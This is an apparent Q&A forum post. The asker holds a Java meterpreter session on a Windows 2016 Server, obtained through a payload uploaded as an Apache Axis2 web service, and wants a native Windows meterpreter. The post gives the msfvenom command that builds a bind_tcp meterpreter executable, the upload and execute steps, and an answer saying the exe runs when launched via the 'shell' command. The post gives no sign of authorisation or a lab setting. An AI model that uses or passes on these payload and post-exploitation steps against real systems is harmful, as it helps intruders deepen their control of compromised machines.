# Switching to native meterpreter

Tags: metasploit, kali-linux, meterpreter, msfvenom

I've managed to get a meterpreter session running between my Kali Linux and Windows 2016 Server by uploading a payload as an Apache Axis2 web service.

I want to change to a windows meterpreter(in order to use windows exploits). I tried creating new .exe payloads with msfvenom and uploaded and executed them through the java meterpreter session. But I'm not able to get a new Windows meterpreter running.

This is what I've tried:

```
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe > bindtcp5555.exe

meterpreter> upload /root/bindtcp5555.exe
...
[*] uploaded   : bindtcp5555.exe -> bindtcp5555.exe
meterpreter > execute -f bindtcp5555.exe -m
Process  created.
```

So I can upload and execute the payload but when I check running processes it's not in the list and my metasploit handler can't establish a session with tcp bind.

What am I doing wrong?

Answer (score 1):

I just had to use the `shell` command in the java meterpreter in order to correctly be able to execute the .exe and get the windows meterpreter session running.